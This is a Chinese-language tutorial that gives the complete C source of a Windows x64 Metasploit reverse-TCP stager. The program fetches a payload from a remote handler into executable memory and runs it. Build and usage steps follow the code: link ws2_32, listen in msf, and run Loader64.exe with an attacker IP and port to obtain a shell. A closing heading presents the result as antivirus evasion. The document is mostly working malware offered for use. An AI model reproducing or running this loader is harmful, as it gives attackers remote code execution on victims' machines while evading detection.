环境
将 Project 设置为 C Project，将应用程序设置为 Console Application；生成的程序从命令行执行。

粘贴下面代码
/*
* A C-based stager client compat with the Metasploit Framework
* based on a discussion on the Metasploit Framework mailing list
*
* @author Raphael Mudge (raffi@strategiccyber.com)
* @license BSD License.
*
* Relevant messages:
* * http://mail.metasploit.com/piper ... ptember/008660.html
* * http://mail.metasploit.com/piper ... ptember/008664.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
/* winsock2.h must come before windows.h, otherwise windows.h drags in the
 * legacy winsock.h and the two declare conflicting symbols. */
#include <winsock2.h>
#include <windows.h>
/* init winsock */
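/* Initialise Winsock 2.2; must run before any other socket call.
 *
 * WSAStartup() returns 0 on success and a positive WSA error code on
 * failure -- it is never negative -- so the original `< 0` test could
 * never fire and a failed start-up fell through into socket() calls.
 * On failure nothing was started, so WSACleanup() is not needed.
 * Exits the process with status 1 on any failure. */
void winsock_init() {
    WSADATA wsaData;
    WORD wVersionRequested = MAKEWORD(2, 2);
    int err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        printf("WSAStartup failed: %d\n", err);
        exit(1);
    }
    /* The DLL may negotiate a lower version than the one requested;
       refuse anything other than 2.2, which is what the error text claims. */
    if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2) {
        printf("ws2_32.dll is out of date.\n");
        WSACleanup();
        exit(1);
    }
}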
/* a quick routine to quit and report why we quit */
/* Fatal-error exit: print `error`, release the socket and the Winsock
 * state, and terminate with status 1.  Never returns.
 * Passing INVALID_SOCKET is tolerated; closesocket() simply fails. */
void punt(SOCKET my_socket, char * error) {
    fprintf(stdout, "Bad things: %s\n", error);
    /* release in reverse order of acquisition: socket first, then Winsock */
    closesocket(my_socket);
    WSACleanup();
    exit(1);
}
/* attempt to receive all of the requested data from the socket */
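/* Read exactly `len` bytes from `my_socket` into `buffer`.
 *
 * recv() may return fewer bytes than asked for, so keep reading until the
 * total is reached.  Returns the number of bytes read (== len on return).
 * Exits via punt() on a socket error or if the peer closes the connection
 * early.  The original had two defects here: a recv() return of 0 (peer
 * closed) was counted as progress, so a half-delivered stage looped
 * forever; and a SOCKET_ERROR (-1) return was added to the counters before
 * it was tested.  Pointer arithmetic on `void *` is also a GNU extension,
 * so the cursor is kept as `char *`. */
int recv_all(SOCKET my_socket, void * buffer, int len) {
    char * cursor = (char *)buffer;
    int total = 0;
    while (total < len) {
        int got = recv(my_socket, cursor, len - total, 0);
        if (got == SOCKET_ERROR)
            punt(my_socket, "Could not receive data");
        if (got == 0)
            punt(my_socket, "Connection closed before all data was received");
        cursor += got;
        total += got;
    }
    return total;
}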
/* establish a connection to a host:port */
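/* Open a TCP connection to targetip:port and return the connected socket.
 *
 * `targetip` may be a dotted-quad or a host name; it is resolved with
 * gethostbyname(), which is IPv4-only (and deprecated, but that is what the
 * original used).  `port` must be in 1..65535.  Exits via punt() on any
 * failure.
 *
 * Fixes over the original: the sockaddr was never zeroed (sin_zero held
 * stack garbage); h_length bytes were copied into the 4-byte sin_addr with
 * no check on the address family or length; connect() was tested for "any
 * non-zero" rather than SOCKET_ERROR; and an out-of-range port was silently
 * truncated by htons(). */
SOCKET wsconnect(char * targetip, int port) {
    struct hostent * target;
    struct sockaddr_in sock = {0};
    SOCKET my_socket;

    if (port < 1 || port > 65535)
        punt(INVALID_SOCKET, "Port must be in the range 1..65535");

    /* setup our socket */
    my_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (my_socket == INVALID_SOCKET)
        punt(my_socket, "Could not initialize socket");

    /* resolve our target */
    target = gethostbyname(targetip);
    if (target == NULL)
        punt(my_socket, "Could not resolve target");
    if (target->h_addrtype != AF_INET
            || target->h_length != (int)sizeof(sock.sin_addr)
            || target->h_addr_list[0] == NULL)
        punt(my_socket, "Target did not resolve to an IPv4 address");

    /* copy our target information into the sock */
    memcpy(&sock.sin_addr, target->h_addr_list[0], sizeof(sock.sin_addr));
    sock.sin_family = AF_INET;
    sock.sin_port = htons((unsigned short)port);

    /* attempt to connect */
    if (connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) == SOCKET_ERROR)
        punt(my_socket, "Could not connect to target");
    return my_socket;
}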
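/* Stager entry point: connect to the Metasploit handler named on the command
 * line, read a 4-byte length, read that many bytes of stage into an
 * executable buffer behind a small x64 prologue, and jump into it.
 *
 * Usage: Loader64.exe <host> <port>
 *
 * Security note: the stage is accepted from whatever answers at host:port
 * with no authentication or integrity check, so anyone who can reach or
 * impersonate the handler gets native code execution in this process.  That
 * is inherent to a reverse-TCP stager; do not reuse this pattern for
 * anything that is not a deliberate payload.
 *
 * Fixes over the original: argc was checked but the arguments were ignored
 * in favour of a hard-coded host/port; the attacker-supplied length was only
 * tested for zero, so a huge value could wrap the allocation size; 0xBF was
 * stored into buffer[0] a second time instead of buffer[1], clobbering the
 * REX prefix and leaving byte 1 unset; and 8 bytes were copied out of a
 * SOCKET whose width depends on the build. */
int main(int argc, char * argv[]) {
    enum {
        STUB_LEN  = 10,        /* 48 BF <imm64> = 2 opcode bytes + 8 immediate */
        MAX_STAGE = 64 << 20   /* upper bound on the attacker-controlled length */
    };
    ULONG32 size = 0;
    char * buffer;
    void (*function)(void);
    ULONG64 sock_val;
    char * end;
    long port;

    winsock_init();
    if (argc != 3) {
        printf("%s [host] [port]\n", argv[0]);
        exit(1);
    }

    /* use the arguments the usage line advertises; strtol so junk is rejected */
    errno = 0;
    port = strtol(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || port < 1 || port > 65535) {
        printf("Bad port: %s\n", argv[2]);
        exit(1);
    }

    /* connect to the handler */
    SOCKET my_socket = wsconnect(argv[1], (int)port);

    /* read the 4-byte length; it arrives in the handler's byte order, which
       on an x64 host is the native one, so no byte swap is applied */
    int count = recv(my_socket, (char *)&size, 4, 0);
    if (count != 4 || size == 0 || size > (ULONG32)MAX_STAGE)
        punt(my_socket, "read a strange or incomplete length value");

    /* NOTE(review): the allocation line was lost in the page's rendering
       (everything between "size <" and "> mov" was swallowed).  The stub
       is executed from `buffer`, so the memory must be executable; an RWX
       VirtualAlloc of size + STUB_LEN is what the layout below implies --
       confirm against the upstream listing. */
    buffer = VirtualAlloc(NULL, (SIZE_T)size + STUB_LEN,
                          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (buffer == NULL)
        punt(my_socket, "could not allocate buffer");

    /* prologue: 48 BF <imm64> = mov rdi, <socket handle>; the stage expects
       its socket in RDI (the 32-bit original is BF <imm32> = mov edi, ...) */
    buffer[0] = 0x48;
    buffer[1] = (char)0xBF;
    /* widen first so exactly 8 bytes are copied regardless of sizeof(SOCKET) */
    sock_val = (ULONG64)my_socket;
    memcpy(buffer + 2, &sock_val, 8);

    /* read the stage in behind the stub; recv_all punts on short reads */
    recv_all(my_socket, buffer + STUB_LEN, (int)size);

    /* cast our buffer as a function and call it */
    function = (void (*)(void))buffer;
    function();
    return 0;
}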
修改SOCKET my_socket = wsconnect("192.168.123.33", 5555); 为你的IP和端口。
在链接选项中添加 -lws2_32（Winsock 2 库，WSAStartup/socket/connect 等函数都在其中）。
按F9 编译并在msf中监听!
在cmd 中执行下面命令
Loader64.exe 192.168.123.33 5555
成功得到shell

免杀效果
